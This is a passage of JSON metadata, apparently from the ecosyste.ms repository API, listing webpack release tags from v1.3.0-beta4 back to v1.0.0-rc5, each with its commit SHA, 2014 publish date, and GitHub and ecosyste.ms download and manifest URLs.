v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","s